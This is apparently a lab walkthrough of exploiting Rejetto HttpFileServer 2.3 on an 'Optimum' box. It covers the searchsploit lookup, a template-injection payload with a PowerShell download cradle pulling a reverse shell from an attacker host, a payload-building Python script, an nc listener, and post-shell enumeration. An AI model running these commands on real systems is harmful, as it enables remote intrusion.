Port 80: HttpFileServer 2.3
$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18/rev.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.14.18/rev.ps1%27%29.}
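How the request above is put together, as an added example that is not part of the original writeup or of 49125.py: a short Python script that builds the PowerShell download cradle, wraps it in the HFS {.exec|...} template macro behind the leading %00, and percent-decodes the result to show what the server-side template engine actually evaluates. The function names are my own; the target and attacker addresses are the ones used on this page, and the "+" after "{." is reproduced from the public exploit as-is.

```python
import urllib.parse

# Helper names (powershell_download_cradle, build_hfs_payload, decoded_search_value)
# are hypothetical; hosts, port and script name are the ones used in this writeup.

PS64 = r"c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe"


def powershell_download_cradle(lhost: str, script: str = "rev.ps1") -> str:
    """Return the in-memory stager run on the target: fetch a script over HTTP
    and IEX it. SysNative is used because HFS runs as a 32-bit process on a
    64-bit host, so a 'System32' path would be redirected to the 32-bit
    SysWOW64 PowerShell; the SysNative alias reaches the native 64-bit binary."""
    return (f"{PS64} IEX (New-Object Net.WebClient)"
            f".DownloadString('http://{lhost}/{script}')")


def build_hfs_payload(rhost: str, rport: int, command: str) -> str:
    """Wrap a command in the HFS {.exec|...} template macro and place it in the
    'search' parameter. %00 is a NUL byte that ends the search string before the
    macro. urllib.parse.quote leaves '/' unescaped by default, which yields
    exactly the encoding seen in the request above."""
    encoded = urllib.parse.quote(command)
    return f"http://{rhost}:{rport}/?search=%00{{.+exec|{encoded}.}}"


def decoded_search_value(url: str) -> str:
    """Percent-decode the search parameter to show the raw macro (NUL byte
    included) that HFS's template engine receives and evaluates."""
    query = urllib.parse.urlsplit(url).query
    key, _, value = query.partition("=")
    if key != "search":
        raise ValueError("expected a single 'search' parameter")
    return urllib.parse.unquote(value)


if __name__ == "__main__":
    cmd = powershell_download_cradle("10.10.14.18")
    url = build_hfs_payload("10.10.10.8", 80, cmd)
    print(url)
    print(repr(decoded_search_value(url)))
```

The decoded value starts with a NUL byte followed by the macro, which is why the injection lands in the search field: anything HFS would normally treat as a search term is cut off before the template parser sees the {.exec|...} block.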
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
optimum\kostas
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
System Type: x64-based PC
Hotfix(s): 31 Hotfix(s) Installed.
cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
v1.0.3705
v1.1.4322
v2.0.50727
v4.0.30319